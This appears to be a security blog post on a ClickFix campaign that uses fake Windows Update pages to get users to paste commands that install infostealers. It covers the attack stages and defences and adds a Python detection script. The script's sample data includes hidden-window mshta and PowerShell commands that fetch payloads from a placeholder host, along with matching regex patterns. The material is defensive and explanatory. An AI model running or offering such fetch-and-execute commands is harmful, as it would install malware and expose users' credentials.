ClickFix Malware Attack Uses Fake Windows Update Screens to Infect Systems
Jan 6, 2026
Cybercriminals have evolved the ClickFix social-engineering attack vector with a new variant that leverages highly convincing fake Windows Update screens in users’ browsers to coerce them into executing commands that ultimately install malware on their systems.
What’s Happening?
Researchers have identified a surge in ClickFix attack variants that trick victims into believing they are completing a critical Windows update. These malicious pages display a full-screen Windows Update animation and instruct users to perform keyboard shortcuts, which automatically paste attacker-controlled commands into the Windows Run box or Command Prompt. When the user executes these commands, malware is downloaded and run on the victim’s machine.
Unlike simplistic fake update traps seen previously, this iteration employs advanced steganography to conceal portions of its payload inside image files, making detection by traditional defenses more difficult.
How the Attack Works
Below is a simplified overview of the attack chain observed by threat researchers:
| Stage | Description |
|---|---|
| 1. Lure | Victim is served a full-screen browser page mimicking the Windows Update interface. |
| 2. Command Trickery | The page uses JavaScript to copy malicious command text into the clipboard and instructs the user to paste it and press Enter. |
| 3. Execution | The pasted command runs via Windows Run or Command Prompt, pulling down malware loaders. |
| 4. Steganographic Payload | Final payloads are encoded within the pixel data of PNG images and extracted in memory using custom loaders. |
| 5. Malware Activation | Infostealers such as LummaC2 and Rhadamanthys are deployed, designed to steal credentials and sensitive user data. |
Note: Real Windows updates do not require users to manually paste and execute arbitrary code.
Why This Is Dangerous
This ClickFix variant is particularly concerning for the following reasons:
Realistic Visual Deception: The fake update screen convincingly mimics the legitimate Windows update interface, lowering user suspicion.
Steganography: Embedding malware code within images that are reconstructed programmatically makes detection harder for signature-based security tools.
Living-off-the-land Tools: The attack abuses trusted Windows binaries like mshta.exe and PowerShell, enabling execution without leaving clear traces on disk.
Persistent Threat: Even after parts of its infrastructure were taken down by law enforcement, the fake update domains remain active, posing ongoing risk.
What Malware Is Delivered?
In the analyzed campaigns, researchers recovered two primary malware families delivered through this technique:
LummaC2 – A credential-stealing malware.
Rhadamanthys – Another information stealer known for harvesting sensitive system and user data.
These payloads are reconstructed and executed in memory, helping them evade traditional disk-based detection.
How to Protect Yourself
To reduce the risk of falling victim to ClickFix attacks, security teams should consider the following measures:
1. Disable Windows Run Box (Win+R)
Where possible, prevent users from invoking the Run dialog, since this is often abused in these attacks.
2. Monitor Process Chains
Watch for unusual child processes such as explorer.exe spawning mshta.exe or unexpected PowerShell commands.
3. User Awareness Training
Educate users on why they should never paste commands into system dialogs or run code from unsolicited web pages.
4. Incident Investigation
In the event of a suspected breach, analysts can review the RunMRU registry key for evidence of malicious commands being executed.
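As an added defender-side example (not code from the original article or from ClearPhish), the following Python applies the checks from steps 2 and 4 to constructed sample data: process-creation records in the style of Sysmon Event ID 1, and a hand-built RunMRU export. The field names, the placeholder.invalid URLs and the argument patterns are assumptions chosen for the demonstration.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style, reduced to
# parent image, child image and command line). Not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://placeholder.invalid/update"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -enc AAAA"},
    {"parent": r"C:\Program Files\Editor\editor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\build.ps1"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Constructed RunMRU export (HKCU\...\Explorer\RunMRU). Each value stores the
# typed text followed by "\1"; MRUList orders the entries, newest first.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": r"notepad\1",
    "b": r"powershell -w hidden -c iwr http://placeholder.invalid/p.png\1",
    "c": r"mshta http://placeholder.invalid/u\1",
}

LOLBINS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Argument traits typical of pasted one-liners: hidden window, encoded command,
# policy bypass, mshta/iwr fetching a URL, or a remote PNG (the stego carrier).
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|\s-e(nc|ncodedcommand)?\s|-ep\s+bypass"
    r"|\b(mshta|iwr)\s+https?://|https?://\S+\.png)")

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def flag_process_chain(event: dict) -> bool:
    """explorer.exe -> mshta.exe is the Win+R path the lure relies on and is always
    flagged; other LOLBins are flagged only on suspicious arguments to limit noise."""
    child, parent = basename(event["image"]), basename(event["parent"])
    if child == "mshta.exe" and parent == "explorer.exe":
        return True
    return child in LOLBINS and bool(SUSPICIOUS_ARGS.search(event["cmdline"]))

def suspicious_runmru(export: dict) -> list:
    """Return RunMRU commands, newest first, that invoke a LOLBin or match the patterns."""
    hits = []
    for key in export.get("MRUList", ""):
        cmd = export[key].rsplit("\\1", 1)[0]
        first = cmd.split()[0].lower() if cmd.split() else ""
        if first in LOLBINS or first + ".exe" in LOLBINS or SUSPICIOUS_ARGS.search(cmd):
            hits.append(cmd)
    return hits
```

Explorer also parents anything started from the Start menu, so the hunt keys on mshta.exe and on argument patterns rather than on every explorer-spawned shell.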
Bottom Line
The ClickFix technique continues to evolve, blending social engineering, stealthy payload delivery, and abuse of trusted system functionality to trick users into infecting their own machines. This campaign underscores the critical importance of combining user education, endpoint monitoring, and behavioral threat detection to protect organizations from sophisticated human-centric attacks like this.
Disclaimer: ClearPhish maintains a strict policy of not participating in the theft, distribution, or handling of stolen data or files. The platform does not engage in exfiltration, downloading, hosting, or reposting any illegally obtained information. Any responsibility or legal inquiries regarding the data should be directed solely at the responsible cybercriminals or attackers, as ClearPhish is not involved in these activities. We encourage parties affected by any breach to seek resolution through legal channels directly with the attackers responsible for such incidents.